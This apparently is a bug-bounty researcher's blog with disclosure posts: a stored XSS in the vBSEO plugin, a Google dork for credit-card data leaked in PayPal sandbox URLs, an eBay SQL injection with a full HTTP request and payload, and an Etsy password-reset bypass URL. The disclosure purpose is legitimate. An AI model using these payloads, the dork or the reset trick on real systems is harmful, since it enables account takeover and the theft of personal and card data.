Tuesday, December 24, 2013

Cross Site Scripting ( XSS - Stored ) vulnerability in vBulletin SEO Plugin vBSEO

Posted by Yogesh Jaygadkar  
Tagged as:
11:07 AM

Exploit Title: Cross Site Scripting ( XSS - Stored ) vulnerability in vBulletin SEO Plugin vBSEO.
Found By:  Yogesh Jaygadkar | http://www.jaygadkar.com/
Tested versions: vBSEO 3.2.0 & vBSEO 3.6.0
Tested with: vBulletin 4.0.6 & vBulletin 4.2.1
Vulnerable POST Parameter:  sendtrackbacks

vBSEO Plugin for vBulletin contains a flaw that allows a stored cross-site scripting (XSS) attack. This flaw exists because the application does not validate the 'sendtrackbacks' parameter upon submission to the /forum/newreply.php & /forum/newthread.php script. This may allow an attacker to create a specially crafted request that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.

POC:

http://www.VictimVBForum.com/forum/newreply.php?do=postreply&t=[Thread ID]
http://www.VictimVBForum.com/forum/newthread.php?do=newthread&f=

In Advanced Reply Or New Thread page, Put your ">vector in "Trackback"
Options.

Submit the Reply. (You can also test it by clicking Preview Post button)

 
Done  ;)

0 comments:

PayPal : User Credit Card Information Disclosure

Posted by Yogesh  
Tagged as:
10:21 AM


Okay... So, here is another one old & duplicate bug from PayPall, which I reported looooong back.


I have found some strange results of api-3t.sandbox.paypal.com. This sub domain is storing all credit card information of paypal user in URL. Below is the google dork for finding such “stored” CC details.


Google Dork: site:sandbox.paypal.com inurl:CVV2=


Google results are not much, nearly 80, but still harmful as sensitive user information is getting leaked.




0 comments:

Friday, February 22, 2013

Listed in Barracuda Networks Hall of Fame

Posted by Yogesh  
Tagged as:
11:28 PM

Listed in Barracuda Networks Security - Hall of Fame.

 
 
Found multiple vulnerabilities in Barracuda security products. Bugs are still not patched.  'll update the POC once all bugs gets patched


Thanks :)

0 comments:

Wednesday, February 20, 2013

Listed in Google Hall Of Fame

Posted by Yogesh  
Tagged as:
11:35 PM


After 2 continues duplicate bugs & 2 Rejections, Google Accepted my 3 bugs... 1 bug is fixed, 2 more in row : D  1st bug did not qualify for a reward so they listed me on their Google Hall of Fame - distinction . But soon I'll be on Reward Recipients page ;)
 
 
So, Finally I am listed in Google Hall Of Fame. ‘ll update the POC once all bugs gets patched

0 comments:

Friday, January 25, 2013

SQL Injection Vulnerability in ebay sub domains

Posted by Yogesh  
Tagged as:
10:13 AM



Title: SQL Injection Vulnerability in www.ebay.com sub domains
Author: Yogesh D Jaygadkar
Reported: December 27, 2012
Fixed: Jan 15, 2013
Public Released: Jan 25, 2013
Thanks To: Darshit Ashara

Greets : Rahul Bro, Aasim, Sandeep, Sagar

Description:

Last Month I reported SQL Injection vulnerabilities in www.ebay.com sub domains. You can see how many days they took for patching & allowing me to publish the vulnerability. But finally they fixed it & listed me in their Researchers Acknowledgement Page.Like every other bounty hunter I was also searching for some vulnerability in EBAY.That time I have no idea that Ebay don’t give bounty for any vulnerability. Not even for SQL Injection. :)

POC:



Vulnerable Parameter:checkbox” Array POST parameter.

Search option in above pages provides a “Select Site” checkboxes which filters the search result by different countries.


HTTP Headers:

Host: sea.ebay.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:
http://sea.ebay.com/searchAnnoucement.php-time=Jan%202012
Cookie: Cookie Value
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

POST Contents: checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+USER())%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&


So this is all for submitting report. After that I simply used sqlmap the gr8 :)


0 comments:

Tuesday, January 8, 2013

Password Reset Vulnerability in etsy.com

Posted by Yogesh  
Tagged as:
3:36 AM





TitlePassword Reset Vulnerability in etsy.com
Vuln URL
https://www.etsy.com/confirm.php?email=
Author: Yogesh D Jaygadkar
Reported: December 30, 2012
Fixed: December 30, 2012
Public ReleasedJan 08, 2013
 

Description:
In etsy.com, when users reset their password, they receives password reset link which is as below.

https://www.etsy.com/confirm.php?email=[User Email ID]&code=[Token code]&action=reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_password_1

When I received this mail, I started playing with this link. I noticed that token is not getting validated from server side. So I removed it & tested with my own id. 



Final POC:
https://www.etsy.com/confirm.php?email=[victim user's email ID]&action=reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_password_1
And Password changed successfully.









Finally I am listed in ETSY Thanks Page. & rewarded with $1500 bounty & T-shirt
Thanks to etsy security team for quick reply. 

Thanks to my friends : Darshit, sandeep, rahul bro, aasim , sagar 

2 comments:

What they says

Proudly Powered by Blogger.
back to top